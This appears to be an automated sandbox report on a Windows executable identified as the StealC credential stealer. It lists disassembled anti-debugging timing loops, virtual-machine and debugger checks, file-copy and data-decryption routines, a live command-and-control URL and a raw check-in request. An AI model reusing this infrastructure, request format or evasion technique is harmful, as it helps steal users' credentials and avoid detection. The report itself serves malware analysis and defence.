Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148D0BB second address: 148D13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0F0527E419h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F0F0527E408h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov dl, 1Eh 0x0000002a push dword ptr [ebp+122D2F62h] 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F0F0527E408h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a add dword ptr [ebp+122D2A70h], ecx 0x00000050 push F774DC86h 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 jmp 00007F0F0527E40Ah 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148D13A second address: 148D13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148E912 second address: 148E945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E411h 0x00000007 jmp 00007F0F0527E413h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jp 00007F0F0527E432h 0x00000014 push esi 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148E945 second address: 148E94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 148E94D second address: 148E953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 14903C5 second address: 14903CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AF0516 second address: 5AF051A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AF051A second address: 5AF051E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AF051E second address: 5AF0524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AF0524 second address: 5AF0536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F04CBD31Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AF0536 second address: 5AF0551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov ah, E9h 0x0000000c mov al, dh 0x0000000e popad 0x0000000f mov dword ptr [esp], ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 movsx edx, si 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AF05E6 second address: 5AF05FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AF05FB second address: 5AF0622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F0F0527E410h 0x0000000a sbb ax, CAE8h 0x0000000f jmp 00007F0F0527E40Bh 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AF0622 second address: 5AF06AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0F04CBD325h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f call 00007F0F04CBD31Ch 0x00000014 pushfd 0x00000015 jmp 00007F0F04CBD322h 0x0000001a sub ah, FFFFFFA8h 0x0000001d jmp 00007F0F04CBD31Bh 0x00000022 popfd 0x00000023 pop eax 0x00000024 pushfd 0x00000025 jmp 00007F0F04CBD329h 0x0000002a and eax, 4A634BC6h 0x00000030 jmp 00007F0F04CBD321h 0x00000035 popfd 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AF06AB second address: 5AF06AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5AF06AF second address: 5AF06C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13B042E second address: 13B0438 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 11FDADF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 11FDB9B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 13B7DEF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 142BACD instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Found evaded block containing many API calls

Source: C:\Users\user\Desktop\file.exe

Evaded block: after key decision

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00F240F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_00F1E530
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00F247C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00F1F7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F11710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00F11710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_00F1DB80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F24B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00F24B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F23B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00F23B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_00F1BE40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_00F1EE20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00F1DF10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F11160 GetSystemInfo,ExitProcess,

0_2_00F11160

Source: file.exe, file.exe, 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1731587725.0000000001DB2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1731587725.0000000001DE3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware2,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F14610 VirtualProtect ?,00000004,00000100,00000000

0_2_00F14610

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00F29BB0

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F29AA0 mov eax, dword ptr fs:[00000030h]

0_2_00F29AA0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F27690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,

0_2_00F27690

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 4460, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F29790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_00F29790
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F298E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,		0_2_00F298E0

Source: file.exe, file.exe, 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: Program Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F575A8 cpuid

0_2_00F575A8

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00F27D20

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F26BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00F26BC0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F279E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00F279E0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00F27BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00F27BC0

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1690239015.0000000005960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4460, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1690239015.0000000005960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4460, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.206	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/6c4adf523b719729.php	true		unknown
http://185.215.113.206/	true		unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Found malware configuration

Source: 0.2.file.exe.f10000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F29030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00F29030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1A2B0 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00F1A2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F172A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00F172A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00F1A210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_00F1C920

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source:	Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00F240F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_00F1E530
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00F247C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00F1F7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F11710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00F11710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_00F1DB80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F24B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00F24B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F23B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00F23B00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_00F1BE40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_00F1EE20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F1DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00F1DF10

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.206/6c4adf523b719729.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 32 42 33 30 34 36 32 46 42 31 32 35 31 38 30 32 30 37 37 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 2d 2d 0d 0a Data Ascii: ------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="hwid"A12B30462FB12518020777------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="build"tale------KJKJJEGIDBGIDGCBAFHC--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.206 185.215.113.206

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.206

Source: C:\Users\user\Desktop\file.exe

0_2_00F162D0

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: unknown

Source: file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php%
Source: file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/b
Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpZ
Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpa
Source: file.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/w
Source: file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/wKL
Source: file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ws
Source: file.exe, file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F50098	0_2_00F50098
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0137214E	0_2_0137214E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F6B198	0_2_00F6B198
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F42138	0_2_00F42138
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01364303	0_2_01364303
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F54288	0_2_00F54288
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F7E258	0_2_00F7E258
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_013693DD	0_2_013693DD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F8D39E	0_2_00F8D39E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_014152DB	0_2_014152DB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F9B308	0_2_00F9B308
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01373567	0_2_01373567
